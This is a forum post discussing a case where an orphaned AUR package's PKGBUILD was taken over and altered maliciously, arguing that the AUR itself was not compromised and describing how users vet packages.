what happened is someone took over an orphaned package & made malicious changes to the PKGBUILD. the fact that they could do that is totally normal and does NOT indicate that the
AUR itself is compromised or anything. nobody claimed that either, but i'm just making sure that people understand what is happening here.
if you know what the
AUR is and how it works, this is really no surprise at all.
one is not supposed to trust these packages explicitely.
i usually go by votes & popularity & comments.
if something is off, people notice very quickly (comments) and take appropriate action (thanks to archlinux' concept of Trusted Users this is possible).
Btw, all this was fixed 1-3 days BEFORE these articles even came out.
PS: of the four links in post #1 i found
this one most informative. it's all there if one cares to read beyond a few buzzwords.
PPS: my original assessment that it's the acroread program itself that is the malware, was wrong. once again, read the article.